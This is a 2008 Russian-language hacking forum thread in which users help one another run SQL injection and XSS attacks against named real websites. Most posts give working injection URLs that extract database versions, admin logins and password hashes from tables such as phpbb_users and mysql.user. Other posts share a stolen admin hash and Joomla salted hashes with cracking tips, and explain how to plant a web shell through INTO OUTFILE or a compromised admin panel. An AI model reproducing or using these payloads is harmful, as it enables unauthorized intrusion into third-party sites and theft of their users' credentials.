http://kinomob.info/index.php?p=showforum&fid=1+union+select+1--
логический вывод - 5 версия, как получить вывод ?

Ch3ck
12.08.2008, 11:10
Шелл на holm.ru, но там есть пхп, поэтому он исполняется, а некопируется...
А не проще на народе какой-нить аккаунт, специально для шеллов и подобного создать?

o3,14um
12.08.2008, 11:32
http://www.world-art.ru/games/games.php?id=4575+or+1=1
инъекции НЕТ!

есть:
http://www.litprom.ru/text.phtml?storycode=1'
но слепая: http://www.litprom.ru/text.phtml?storycode=20+union+select+1
логическая ошибка
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in

проходит фильтрацию. если число больше или меньше допустимого - выводится страница с ошибкой. Если нормальное (именно первое число, без остального запроса), то отправляется к БД, но уже с остальным запросом

superboys
12.08.2008, 12:01
я дето слышал что через иньекцию мона посмотреть какие папки на сервере мона такое очуществить и как?

superboys
12.08.2008, 12:23
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=-1'+and+1=2+union+select+1,2,3,4,aes_decrypt(aes_en crypt(concat_ws(0x3a,version(),database(),user()), 0x71),0x71),6,7,8,9/* кто поможет выудить пасс к мусклу если чо вот удалённый доступ к мусклу http://81.177.9.37:911/administration/mysql/index.php

n0ne
12.08.2008, 12:25
superboys, прав не хватит на чтение mysql.user

superboys
12.08.2008, 12:27
это в каком сообщение 1 или 2?)

Ershik
12.08.2008, 12:33
Ко второму.
К первому нужны права на чтение файлов.

superboys
12.08.2008, 12:35
ппц, а чо ещё можно сделать? Кроме как ддосить, крашить и т.д.

Ershik
12.08.2008, 12:42
Оставь как есть или напиши администратору о дырке.

nicusor
12.08.2008, 13:49
ппц, а чо ещё можно сделать? Кроме как ддосить, крашить и т.д.

можно узнать пароль админа на форуме
потом через форум можно залить шелл .. и будет тебе счастье :)

попробуй такие идеи
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=-1'+and+1=2+union+select+1,2,3,4,aes_decrypt(aes_en crypt(concat_ws(0x3a,version(),database(),user()), 0x71),0x71),6,7,8,9/*

это для технической информации

также можешь узнать пароль и имена пользователей
таблица
phpbb_users
поля
username
user_password

Glazz
12.08.2008, 13:50
может кто показать , как заливают фаил через load_file() в скл инъекции .

Red_Red1
12.08.2008, 13:56
Вот отличная статья, там все написано https://forum.antichat.ru/showthread.php?t=19605
Смотри пункт
4)Получить шелл


Ах да, файл НЕ заливают через LOAD_FILE() его читают. А заливают через into+outfile+'/ПУТЬ/ИМЯ_ФАЙЛА'

Glazz
12.08.2008, 14:29
Вот отличная статья, там все написано https://forum.antichat.ru/showthread.php?t=19605
Смотри пункт
4)Получить шелл


Ах да, файл НЕ заливают через LOAD_FILE() его читают. А заливают через into+outfile+'/ПУТЬ/ИМЯ_ФАЙЛА'
спасибо , почитаю.
А ИМЯ_ФАЙЛА(путь) на моем компе , или на его? и заливается , то куда?

nicusor
12.08.2008, 14:58
http://fastflowerstoukraine.com/local/plug-in/a-price/showone.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,table_name ),7,8,9,10,11,12,13,14,15,16,17+from+information_s chema.tables+limit+0,1/**
а дальше?
тут 4 версия мы можем только подобрать таблицы. information_schema.tables есть только в 5 версии и выше

superboys
12.08.2008, 15:18
можно узнать пароль админа на форуме
потом через форум можно залить шелл .. и будет тебе счастье :)

попробуй такие идеи
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=-1'+and+1=2+union+select+1,2,3,4,aes_decrypt(aes_en crypt(concat_ws(0x3a,version(),database(),user()), 0x71),0x71),6,7,8,9/*

это для технической информации

также можешь узнать пароль и имена пользователей
таблица
phpbb_users
поля
username
user_password
по твоей подсказке сделал такой запрос http://evo.nightspirits.net/indexframe.php?razdel=news&comm=1'+and+1=2+union+select+1,2,3,4,username,user _password,7,8,9+from+phpbb_users/* но почемут не видно данных базы.

superboys
12.08.2008, 15:30
скорей сего шифрование _ пробывал с декриптом ваще ошибка(

nicusor
12.08.2008, 15:34
по твоей подсказке сделал такой запрос http://evo.nightspirits.net/indexframe.php?razdel=news&comm=1'+and+1=2+union+select+1,2,3,4,username,user _password,7,8,9+from+phpbb_users/* но почемут не видно данных базы.

hex, aes_encrypt

Red_Red1
12.08.2008, 15:38
Юзай лимит Х,Х
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=1'+and+1=2+union+select+1,2,3,4,username,user _password,7,8,9+from+phpbb_users+limit+1,1/*

superboys
12.08.2008, 15:39
да хоть бы показал синтаксис)

superboys
12.08.2008, 15:40
спс Ред_Ред1

nicusor
12.08.2008, 15:51
да хоть бы показал синтаксис)
а маны кто будет читать ?

superboys
12.08.2008, 16:01
в манах такого нет) Да ужо всё наашёл хэш Lupo:b7dba5a1bc3605a87b59ac8147512c97

sabe
12.08.2008, 20:59
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=999999999'+union+select+1,2,3,concat_ws(0x3a, username,user_password),5,6,7,8,9+from+phpbb_users +where+user_level=1+limit+0,1/*
piton;526635

дай форум залью шелл )

tor4)
12.08.2008, 21:17
Посмотрите если инклуд
http://admzven.ru/cgi-bin/document.pl?action=showFullDoc&p=1'

0nep@t0p
12.08.2008, 23:05
Проблема такая - есть админка, есть возможность редактирования страниц ( в т.ч. вставка произвольного пхп кода, который выполнится ) ( все страницы в виде site.com/kkk.php?id=x ) , но вставив код веб-шелла в одну из страниц и перейдя по ней я увидел вместо шелла какие-то каракули =/ Что можно сделать чтобы получить веб-шелл ?
Евал шелл имеется

OMG!!
12.08.2008, 23:18
0nep@t0p, попробуй вставить зашифрованный код.. или как вариант - код простенького аплоадера, а через него ( если он выполнится ) заливай шел.. но если каракули там скорее всего MIME type не для выполнения стоит

superboys
13.08.2008, 01:44
piton;cazzo

дай форум залью шелл )
http://nightspirits.net/forum/ на лови

zjuk@
14.08.2008, 02:41
Доброго времени суток всем.
Поможите пожалуйста столкнулся с проблемой при вводе корректной sql-инъекции(где имена полей угаданы после суточного ручного перебора) сайт выдаёт свою дефолтную страницу, пример:
_http://www.tarmatrade.ee/index.php?cat=-1+union+select+1,concat_ws(0x3a,nimi,parool)+from+ tarma_kasutajad+limit+0,1/*

для наглядности зделаем ошибку в поле с именем nimi, заменим на name
_http://www.tarmatrade.ee/index.php?cat=-9999+union+select+1,concat_ws(0x3a,name,parool)+fr om+tarma_kasutajad+limit+0,1/*
и картина уже совершенно иная.
Как всё же обойти эту защиту и прочитать результат запроса. (пробовал через Navisckope, но то ли руки кривые, то ли...)

MaSTeR GэN
15.08.2008, 07:59
2zjuk@ полей для вывода нет выход только слепая иньекция )

zjuk@
15.08.2008, 14:02
2zjuk@ полей для вывода нет выход только слепая иньекция )
Это печально =(((

Shaitan-Devil
16.08.2008, 15:41
ТОварисчи есть ли методы обхода mod-rewrite,а то скуль нашел.Гуглил.

Taylorith
16.08.2008, 16:44
сегодня гуляя по сайте наткнулся на такое...

Warning: mysql_query() [function.mysql-query]: Access denied for user 'lighttpd'@'localhost' (using password: NO) in /srv/www/site/config.php on line 150

Warning: mysql_query() [function.mysql-query]: A link to the server could not be established in /srv/www/site/config.php on line 150

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /srv/www/site/config.php on line 151

интересно .. прочитал пару факов и думаю что мона провести инхекцию, но к сожалению прикол в том что я даже не вводил в запрос никаких ковычек типа ' , сама страниа так секбя ведет, значит непосредственно в коде ошибка, ну это ладно ,переживу... главное вот что , адрес ошибки вот такой...
http://www.site.com/faq.html никаких данных не передается, и как мне провести инхекцию?

.Slip
16.08.2008, 16:49
сегодня гуляя по сайте наткнулся на такое...

Warning: mysql_query() [function.mysql-query]: Access denied for user 'lighttpd'@'localhost' (using password: NO) in /srv/www/site/config.php on line 150

Warning: mysql_query() [function.mysql-query]: A link to the server could not be established in /srv/www/site/config.php on line 150

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /srv/www/site/config.php on line 151

интересно .. прочитал пару факов и думаю что мона провести инхекцию, но к сожалению прикол в том что я даже не вводил в запрос никаких ковычек типа ' , сама страниа так секбя ведет, значит непосредственно в коде ошибка, ну это ладно ,переживу... главное вот что , адрес ошибки вот такой...
http://www.site.com/faq.html никаких данных не передается, и как мне провести инхекцию?
>> Access denied for user 'lighttpd'@'localhost' (using password: NO) in /srv/www/site/config.php on line 150

Нету доступа к мускулю. Это не уязвимость.

Taylorith
16.08.2008, 17:04
ясн спасибо

sabe
17.08.2008, 01:07
http://www.combined.biz/portfolio_details.php?id=-1+union+select+1,table_name,3,4,5,6+from+informati on_schema.tables--
какие мысли ?

Red_Red1
17.08.2008, 01:32
Да что то информатион_схема недоступна.
Но мысли есть вот такие
http://www.combined.biz/news_article.php?id=999999+union+select+1,UNHEX(HE X(password)),3,4,UNHEX(HEX(user_name)),6,7+from+us er
;)

Вдогонку ;)
http://www.combined.biz/news_article.php?id=999999+union+select+1,UNHEX(HE X(password)),3,4,UNHEX(HEX(user)),6,7+from+mysql.u ser+limit+0,1

sabe
17.08.2008, 07:14
Вдогонку ;)
это понятно..) я про information_schema спрашивал. всеровно спс.)

ап

Cry Wolf
17.08.2008, 08:05
Вопросик, сидел вводил всякое в поисках XSS. Ввел полную белеберду в поле ввода мылаbla'<script>alert()</script> получил переадресацию на другой сайт.

alert()> вылезло за пределы поля для ввода текста </script скушало. А вверху закрасовалось вот такая ошибка БД:

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/www/htdocs/include/funcs_user.inc on line 176

Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in /home/www/htdocs/include/funcs_user.inc on line 181

Это уязвимость? Или просто тупой глюк?

sabe
17.08.2008, 08:07
' ? = sql inj

truelamer
17.08.2008, 09:02
Достал я парол я хэши из джумлы

admin:6f0f0e2db9c8f58e2b309afa6569f744:oSX0uUSDl4I rdL63

или

admin:68356d102feeaf197f4fd0c4dda59ed8:2K70yZkYvva P7o9I

а как его рассшифровать?
где сервисы? просто md5 не помогает тут он какойто хитрожопый
как такое расшифровывать?

SVAROG
17.08.2008, 09:32
Достал я парол я хэши из джумлы

admin:6f0f0e2db9c8f58e2b309afa6569f744:oSX0uUSDl4I rdL63

или

admin:68356d102feeaf197f4fd0c4dda59ed8:2K70yZkYvva P7o9I

а как его рассшифровать?
где сервисы? просто md5 не помогает тут он какойто хитрожопый
как такое расшифровывать?
прога PasswordsPro при добавлении тип хеша указываешь MD5(HMAC), должно помочь

truelamer
17.08.2008, 10:02
спасибо но думаю не в этом дело, я то знаю сервисы где md5 можно подобрать, А тут вроде как конкотинасия пароля с правой кадаброй после :. Вот мне интересны сервисы кот позволяют узнать пароль вбив хэш и кадабру. Или как это вообще можно сделать

BlackSun
17.08.2008, 11:02
Это не кадабра, это соль. Юзай PasswordsPro

$n@ke
17.08.2008, 12:29
сервис..мм..попробуй, там по моему соленые мд5 тоже катят:
https://hashcracking.info/

truelamer
17.08.2008, 16:29
а вот это какого вида???

admin:68356d102feeaf197f4fd0c4dda59ed8:2K70yZkYvva P7o9I

вида md5(md5($pass).$salt) или какого?

Jokester
17.08.2008, 16:39
Если джумла то md5($pass.$salt)

SVAROG
17.08.2008, 19:17
помогие со скулей
http://www.wfsj.org/resources/page.php?id=-69+union+select+1,2,3,4,5,6,7,8,9,0,1/*
нимогу ни версию ни всего остольного получить

Jokester
17.08.2008, 19:22
SVAROG
http://www.wfsj.org/resources/page.php?id=-69+union+select+1,2,UNHEX(HEX(version())),4,5,6,7, 8,9,0,1/*

georgich
17.08.2008, 20:29
Вот хотел узнать, как можно узнать адрес админки? Ну, а потом, если повезет, то и багу какую-нибудь для доступа к сайту. Буду очень признателен за инфу. Спасибо.

Elephant
17.08.2008, 21:03
http://gta.com.ua/file_sa_details.phtml?id=-59+union+select+1,2,3,4,5,6,7,8,9,10,11+from+gtaco m_gta.tables+where+TABLE_NAME=users,12,13,14,15,16 ,17,18,19,20/*

Что я неправельно сделал?

Мне надо из базы посмотреть названия таблиц, а я немогу((((9

0nep@t0p
17.08.2008, 21:13
0_о
Это пипец какой-то. Я покушал валидола, успокоился и отвечаю, запрос апсолютна нихрена неправильный - это раз. Во - вторых версия мускула 4, имена всех таблиц ты никак не увидишь, только перебор таблиц -
http://gta.com.ua/file_sa_details.phtml?id=-59+union+select+1,2,3,version(),5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20/*

И вот тебе бонус -
http://gta.com.ua/file_sa_details.phtml?id=-59+union+select+1,2,3,concat(username,0x3a,passwor d),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from +admin/*

Читай маны, а то после еще одного такого поста у мну инфаркт случится

extrem0
17.08.2008, 21:33
http://site.com/account/index.php?n=shops&shop=9+and+ascii(substring((SELECT+concat(username ,0x3a,password)+from+account+limit+0,1),1,1))>51

Ситуация такова: веб-сервер с мускулом 5, нашел уязвимость . Знаю названия: базы,таблиц,колонок. Посредством слепой иньекции выудил логин(username) и хэш(password) админа из таблицы account (см. выше)

Вопрос:
Т.к. не удается сбрутить хэш ( хэш из пароля видимо получается в несколько неизвестных шагов,а не просто "sha1(password)"), возник вопрос. Как модифицировать в этой же таблице "account" значение в колонке "banned" с 1 на 0 ?

0nep@t0p
17.08.2008, 21:38
Это майскуль, разделение запросов в ней отсутствует, то есть модифицировать информацию в базе данных посредством скуль инъекции тебе не удастся

extrem0
17.08.2008, 21:52
Это майскуль, разделение запросов в ней отсутствует, то есть модифицировать информацию в базе данных посредством скуль инъекции тебе не удастся
Понятно... А существует ли иной способ модификации инфы(через php например) ?

Cry Wolf
18.08.2008, 02:43
Возник такой вопрос. Ввел в строку имени в коментах к статьям привычный <script>alert()</script>, имя в комментарии не отобразилось, а при каждом входе на страницу теперь опера выдает уведомление о выполнении джава скрипта... Это активная XSS?

Вот ссылка http://gayby.org/news/comments/192.html

krypt3r
18.08.2008, 06:58
Это майскуль, разделение запросов в ней отсутствует
А точка с запятой?

Ded MustD!e
18.08.2008, 07:03
Возник такой вопрос. Ввел в строку имени в коментах к статьям привычный <script>alert()</script>, имя в комментарии не отобразилось, а при каждом входе на страницу теперь опера выдает уведомление о выполнении джава скрипта... Это активная XSS?

Вот ссылка http://gayby.org/news/comments/192.html

Да, там кстати кавычки фильтруются.

А точка с запятой?

Нет, не путай MySQL5 и MSSQL

Shaitan-Devil
18.08.2008, 09:56
Мож кто -нибудь осветит мой вопрос по mod_rewrite?
Вот уязвимый скрипт
http://www.savchenko.ru/developments/84.html

Ded MustD!e
18.08.2008, 10:01
Мож кто -нибудь осветит мой вопрос по mod_rewrite?
Вот уязвимый скрипт
http://www.savchenko.ru/developments/84.html


Невижу вопроса. /85-1.html уязвимость есть.

Shaitan-Devil
18.08.2008, 10:12
Вопрос не в этом вопрос в том как это обходить!Он просто выводит пустую страницу,при обычных запросах,здесь нужен посимв.перебор?